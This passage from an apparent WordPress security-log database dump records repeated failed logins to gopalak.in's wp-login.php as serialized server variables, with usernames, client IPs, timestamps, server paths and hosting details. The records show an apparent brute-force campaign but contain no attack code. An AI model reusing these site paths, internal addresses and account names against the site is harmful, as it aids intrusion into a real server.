TOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"134\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746986343.625273;s:12:\"REQUEST_TIME\";i:1746986343;}}','13.233.245.36',1,'2025-05-11 23:29:05','2025-05-12 23:29:05'),(95586,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42632\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.131\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747017867.0796051;s:12:\"REQUEST_TIME\";i:1747017867;}}','67.223.118.131',0,'2025-05-12 08:14:28','1970-01-01 00:00:00'),(95587,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40052\";s:11:\"REMOTE_ADDR\";s:11:\"162.0.235.8\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747018167.604089;s:12:\"REQUEST_TIME\";i:1747018167;}}','162.0.235.8',0,'2025-05-12 08:19:29','1970-01-01 00:00:00'),(95588,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52390\";s:11:\"REMOTE_ADDR\";s:14:\"198.187.29.123\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747018474.193239;s:12:\"REQUEST_TIME\";i:1747018474;}}','198.187.29.123',0,'2025-05-12 08:24:35','1970-01-01 00:00:00'),(95589,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36 Edg/112.0.1722.68\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"33410\";s:11:\"REMOTE_ADDR\";s:15:\"102.130.117.188\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747018772.7517099;s:12:\"REQUEST_TIME\";i:1747018772;}}','102.130.117.188',0,'2025-05-12 08:29:34','1970-01-01 00:00:00'),(95590,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40442\";s:11:\"REMOTE_ADDR\";s:12:\"66.29.141.17\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747019076.523015;s:12:\"REQUEST_TIME\";i:1747019076;}}','66.29.141.17',0,'2025-05-12 08:34:38','1970-01-01 00:00:00'),(95591,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50830\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.139\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747019380.2346129;s:12:\"REQUEST_TIME\";i:1747019380;}}','199.188.200.139',0,'2025-05-12 08:39:42','1970-01-01 00:00:00'),(95592,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49122\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.229.206\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747019685.530354;s:12:\"REQUEST_TIME\";i:1747019685;}}','162.0.229.206',0,'2025-05-12 08:44:47','1970-01-01 00:00:00'),(95593,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"96\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40060\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.114.125\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747020021.660475;s:12:\"REQUEST_TIME\";i:1747020021;}}','198.54.114.125',0,'2025-05-12 08:50:23','1970-01-01 00:00:00'),(95594,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37444\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.18\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747020320.691623;s:12:\"REQUEST_TIME\";i:1747020320;}}','198.54.114.18',0,'2025-05-12 08:55:22','1970-01-01 00:00:00'),(95595,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53246\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.42\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1747020637.181855;s:12:\"REQUEST_TIME\";i:1747020637;}}','198.54.114.42',0,'2025-05-12 09:00:38','1970-01-01 00:00:00'),(95596,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"tr-TR,tr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, 